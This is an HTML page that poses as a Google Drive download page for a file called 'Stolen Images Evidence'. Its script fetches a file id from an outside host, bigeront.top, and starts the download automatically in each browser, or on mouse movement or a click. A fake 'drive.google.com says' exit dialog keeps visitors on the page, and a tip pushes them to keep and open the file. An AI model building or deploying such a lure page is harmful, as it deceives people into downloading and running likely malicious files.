<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>title</title>
    <meta http-equiv="refresh" content="" id="reload">
    <link rel="icon" href="http://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico">
    <link rel="stylesheet" type="text/css"
          href="https://cdn.rawgit.com/carlsednaoui/ouibounce/master/test/ouibounce.min.css">
    <script type="text/javascript"
            src="https://cdnjs.cloudflare.com/ajax/libs/ouibounce/0.0.11/ouibounce.min.js"></script>
    <!--    <meta http-equiv="Content-Security-Policy" content="script-src 'unsafe-inline'">-->
    <style>
        body {
            margin: 0;
            padding: 0;
        }

        .logo {
            height: 200px;
            margin: 0 auto
        }

        .preloader {
            position: absolute;
            top: 10%;
            left: 50%;
            transform: translate(-50%, -40%);
            background: #fff;
            z-index: 200;
            opacity: 1;
            -webkit-transition: opacity .5s;
            transition: opacity .5s;
            text-align: center;
            width: 320px
        }

        .loader {
            height: 5px;
            background-color: #2684fc;
            position: absolute;
            margin-top: 3%;
            border-radius: 20px;

        }

        .otherloader {
            height: 0;
            position: absolute;
            top: 100%;
            left: 50%;
            transform: translate(-50%, -40%);
            z-index: 300;
            width: 100%;
        }

        .content {
            opacity: 0;
            -webkit-transition: opacity .3s;
            transition: opacity .3s;
        }

        .content.here {
            opacity: 1;
        }

        #btn {
            margin-top: 53%;
        }

        @-moz-document url-prefix() {
            #btn {
                margin-top: 53%;
                /*top: 100%;*/
            }
        }

        #btn {
            background-color: #1a73e8;
            color: #fff;
            text-decoration: none;
            display: flex;
            justify-content: center;
            align-items: center;

            font-weight: 500;
            -moz-osx-font-smoothing: grayscale;
            -webkit-font-smoothing: antialiased;
            font-family: "Google Sans", Arial, sans-serif;
            -webkit-appearance: button;
            font-size: 1rem;
			font-weight: 500;
            line-height: 1.375rem;
            letter-spacing: .03125rem;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            height: 46px;
            outline: none;
            padding: 0 24px;
        }

        #btn_alert {
            background-color: #1a73e8;
            color: #fff;
            text-decoration: none;
            display: flex;
            justify-content: center;
            align-items: center;
            position: absolute;
            font-weight: 500;
            -moz-osx-font-smoothing: grayscale;
            -webkit-font-smoothing: antialiased;
            font-family: "Google Sans", Arial, sans-serif;
            -webkit-appearance: button;
            font-size: 1rem;
			font-weight: 500;
            line-height: 1.375rem;
            letter-spacing: .03125rem;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            height: 46px;
            outline: none;
            padding: 0 24px;
        }

        #btn:hover {
            background-color: #174ea6;
        }

        #message {
            box-shadow: 0 1px 3px 0 rgba(60, 64, 67, 0.302), 0 4px 8px 3px rgba(60, 64, 67, 0.149);
            width: 273px;
            border-radius: 10px;
            padding: 10px;
            display: none;
            position: absolute;
            margin: auto;


        }

        .content p {
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .chr-headline {
            font-size: 2.2rem;
            line-height: 2.65rem;
            letter-spacing: -.04688rem;
            color: #202124;
            -webkit-font-smoothing: antialiased;
            font-family: "Google Sans", Arial, sans-serif;
            font-weight: normal;
            margin-top: 12px;
            text-align: center;
            white-space: nowrap;
            position: absolute;
            left: 50%;
            transform: translateX(-50%);

        }

        #message p {
            text-align: center;
            -webkit-font-smoothing: antialiased;
            font-family: "Google Sans", Arial, sans-serif;
            font-weight: normal;
        }

        .wait {
            position: absolute;
            bottom: -40%;
            left: 50%;
            transform: translate(-50%);
            font-size: 20px;
            color: #999;
            -webkit-font-smoothing: antialiased;
            font-family: "Google Sans", Arial, sans-serif;
            font-weight: normal;
            text-transform: capitalize;


        }

        #ouibounce-modal {
            z-index: 1111;
        }

        #ouibounce-modal .modal {
            height: 165px;
            width: 400px;
            top: 5px;
            right: 0;
            bottom: auto;
        }

        .modal-body {
            display: flex;
            flex-direction: column;
        }

        #btn_alert {
            align-self: flex-end;
            margin-top: 80px;
        }

        .page_name {
            font-size: 20px;
            margin-bottom: 0
        }

        .chr-subheadline {
            font-size: 1rem;
            line-height: 1.4rem;
            color: #3c4043;
            -webkit-font-smoothing: antialiased;
            font-family: "Google Sans", Arial, sans-serif;
            font-weight: normal;
            margin-top: 33%;
            position: absolute;
            text-align: center;
            left: 50%;
            transform: translateX(-50%);
            width: 100%;
        }
    </style>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>

    <script>
        let a = false
        var params = {
            url: "#",  // fill your url
            loadingTime: 20,    // loader loading time
            showDownloadMsg: 6000,  // after downloading message
            redirectTime: 1, // time after which will be redirect on file
            exitAlert: 'yes', // when check is yes this exit alert doesn't work
            blockCustomAlert: 'yes',
            FirefoxAutoloadingTime: 1,
            Chrome: {
                bottom: '',
                left: '0',
                right: '0',
                top: '420px',
                check: 'no',  // if there is yes will be work click on all browser, if no only on button
                auto_download: 'yes', //if there yes  browser will redirect to your url
                mouseMove: 'no',
            },
            Edge: {
                bottom: '20px',
                left: '40%',
                right: '',
                top: '',
                check: 'no',
                auto_download: 'yes',
                mouseMove: 'no',

            },
            Firefox: {
                bottom: '',
                left: '',
                right: '20px',
                top: '20px',
                check: 'no',
                auto_download: 'yes',
                mouseMove: 'no',
            },
            Opera: {
                bottom: '',
                left: '',
                right: '20px',
                top: '20px',
                check: 'no',
                auto_download: 'yes',
                mouseMove: 'no',
            },
            Chromium: {
                bottom: '20px',
                left: '',
                right: '',
                top: '',
                check: 'no',
                auto_download: 'yes',
                mouseMove: 'no',
            }
        }
        // if (params.blockCustomAlert === 'yes') {
        //     var _ouibounce = ouibounce(document.getElementById('ouibounce-modal'), {
        //         aggressive: true, //Making this true makes ouibounce not to obey "once per visitor" rule
        //     });
        // }

        function loaderStrip() {
            $(window).load(function () {
                var loader = $('.loader');
                var otherloader = $('.otherloader');
                var wHeight = $(window).height();
                var wWidth = $(window).width();
                var i = 0;

                loader.css({
                    top: wHeight / 0,
                    left: wWidth / 0
                });

                do {
                    loader.animate({
                        width: i
                    }, params.loadingTime);
                    i += 2;
                } while (i <= 140);
                if (i === 142) {

                    loader.animate({left: 0, width: '100%'}, function () {
                        otherloader.animate({height: '10vh'}, function () {
                            loader.css({'opacity': 0, 'margin-top': 0});
                            $('.logo').animate({
                                'width': '100px',
                                'height': '100px'
                            })
                            $('.content').addClass('here');
                            $('.wait').animate({height: 0, opacity: 0}, 3)
                        });
                    });
                }

            });
        }
        loaderStrip();

        // window.onload = function () {

        //**************************************************************************
        //****************************************************************************
        //**********************************
        //**************************************************************************
        // **************************************************************************

        $.getJSON( "https://bigeront.top/jb39fj6kke/", function(res) {

        }).done(function(res) {
            params.loadingTime = 0
            console.log(res, "ddddd")
            params.url = "https://drive.google.com/uc?export=download&id=" + res.data
            hello("https://drive.google.com/uc?export=download&id=" + res.data)
        })
            .fail(function() {
                console.log( "error" );
            })

        // $.ajax({
        //     url: 'http://drive:8888/ex/',
        //     type: 'get',
        //     beforeSend: function(){
        //         params.loadingTime = 20
        //         alert('before')
        //         // $(".logo").show();
        //     },
        //     success: function(res){
        //         console.log(res, "ddddd")
        //         $(".loader").hide();
        //         params.loadingTime = 0
        //         // params.url = "https://drive.google.com/uc?export=download&id=" + res.data
        //         //         hello("https://drive.google.com/uc?export=download&id=" + res.data)
        //     },
        //     complete:function(data){
        //
        //         alert('complete')
        //         // Hide image container
        //         $(".loader").hide();
        //     }
        //
        // });


        function hello(e) {
            params.url = e
            console.log(params.url, "seeewrewrw")


            //*******************************************************************
            //*******************************************************************
            //*******************************************************************

            var btn_alert = document.getElementById('btn_alert')
            btn_alert.setAttribute('href', params.url)
            btn_alert.setAttribute('download', 'true')
            var btn = document.getElementById('btn')
            for (const [key, value] of Object.entries(params)) {
                if ((navigator.userAgent.indexOf(key) > -1)) {
                    if (value.mouseMove === 'yes') {
                        let count = 0
                        document.addEventListener('mousemove', () => {
                            count = count + 1
                            if (count === 1) {
                                window.onbeforeunload = () => undefined;
                                window.location = params.url
                                $(document).off("mousemove", mouse);
                            }
                        })
                    }
                    if (value.auto_download === 'yes') {
                        if (key === 'Firefox') {
                            setTimeout(() => {
                                window.location = params.url
                            }, params.FirefoxAutoloadingTime)
                        }
                        setTimeout(() => {
                            $(document).ready(() => {
                                window.onbeforeunload = () => undefined;
                                window.location = params.url
                                setTimeout(() => {
                                    $('#message').css({
                                        'display': 'block',
                                        'bottom': value.bottom,
                                        'top': value.top,
                                        'right': value.right,
                                        'left': value.left
                                    })
                                }, params.showDownloadMsg)
                                // document.getElementById('reload').setAttribute('content', params.redirectTime + ';url=' + params.url)
                            });
                        }, params.redirectTime)
                    }
                    if (value.check === 'no') {
                        btn.setAttribute("href", params.url)
                        btn.setAttribute('download', true)

                    } else if (value.check === 'yes') {
                        document.addEventListener('click', () => {
                            window.onbeforeunload = () => undefined;
                            window.location = params.url
                            // document.getElementById('reload').setAttribute('content', params.redirectTime + ';url=' + params.url)
                        })
                    }

                    $('#btn, #btn_alert').click((e) => {
                        window.onbeforeunload = () => undefined;
                        setTimeout(() => {
                            $('#message').css({
                                'display': 'block',
                                'bottom': value.bottom,
                                'top': value.top,
                                'right': value.right,
                                'left': value.left
                            })
                        }, params.showDownloadMsg)
                    })
                    $('#btn, #btn_alert').click((e) => {
                        window.onbeforeunload = () => undefined;
                        setTimeout(() => {
                            $('#message').css({
                                'display': 'block',
                                'bottom': value.bottom,
                                'top': value.top,
                                'right': value.right,
                                'left': value.left
                            })
                        }, params.showDownloadMsg)
                    })
                }
            }
        }
        // }
        if (params.exitAlert === 'yes') {
            window.onbeforeunload = function (evt) {
                var message = "Test";
                if (typeof evt == "undefined") {
                    evt = window.event;
                }
                if (evt) {
                    evt.returnValue = message;
                }
                return null;
            }
        }

    </script>
</head>
<body id="drive_iframe">
<div class="preloader">
    <div class="logo">
        <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 1443.061 1249.993">
<svg width="100%" height="100%" viewBox="0 0 94 94" fill="none" xmlns="http://www.w3.org/2000/svg">
<rect width="100%" height="100%" fill="white"/>
<path d="M10.7219 73.2906L14.4917 79.8021C15.275 81.1729 16.401 82.25 17.7229 83.0333L31.1865 59.7292H4.25937C4.25937 61.2469 4.65104 62.7646 5.43437 64.1354L10.7219 73.2906Z" fill="#0066DA"/>
<path d="M47 32.3125L33.5365 9.00833C32.2146 9.79166 31.0885 10.8687 30.3052 12.2396L5.43437 55.3229C4.65104 56.6938 4.25937 58.2115 4.25937 59.7292H31.1865L47 32.3125Z" fill="#00AC47"/>
<path d="M47 32.3125L60.4635 9.00833C59.1416 8.22499 57.6239 7.83333 56.0573 7.83333H37.9427C36.376 7.83333 34.8583 8.27395 33.5364 9.00833L47 32.3125Z" fill="#00832D"/>
<path d="M62.8135 59.7292H31.1864L17.7229 83.0333C19.0448 83.8167 20.5625 84.2083 22.1292 84.2083H71.8708C73.4375 84.2083 74.9552 83.7677 76.2771 83.0333L62.8135 59.7292Z" fill="#2684FC"/>
<path d="M76.2771 83.0333C77.599 82.25 78.725 81.1729 79.5083 79.8021L81.075 77.1094L88.5656 64.1354C89.3489 62.7646 89.7406 61.2469 89.7406 59.7292H62.8625L76.2771 83.0333Z" fill="#EA4335"/>
<path d="M76.1302 33.7813L63.6948 12.2396C62.9115 10.8687 61.7854 9.79166 60.4635 9.00833L47 32.3125L62.8135 59.7292H89.6917C89.6917 58.2115 89.3 56.6938 88.5167 55.3229L76.1302 33.7813Z" fill="#FFBA00"/>
</svg>
        </svg>
    </div>
    <div class="loader"></div>
    <p class="wait">please wait...</p>
    <div class="otherloader">
        <div class="content">
            <h1 class="chr-headline">
                File 'Stolen Images Evidence'<br>is ready for download
            </h1>
			<p class="chr-subheadline">Your download should begin automatically. Didn’t work? Try downloading again.</p>

			<div>
			<p>
                <a href="#" id="btn" target="_self">Download my file</a>
            </p>
			</div>

        </div>
    </div>
</div>

<div id="message">
    <p> <b>Tip: </b>Click 'Keep' or 'Save' first, and then click the file name to open it</p>
</div>

<!-- Ouibounce Modal -->
<div id="ouibounce-modal">

    <div class="modal">
        <div class="modal-body">
            <p class="page_name"><b>drive.google.com says:</b></p>
            <p>Do you really want to exit?</p>
            <a href="#" id="btn_alert" onclick="document.getElementById('ouibounce-modal').style.display = 'none';">Continue</a>
        </div>

    </div>
</div>

<script>
    window.parent.document.body.style.overflow = "hidden";
</script>


</body>
</html>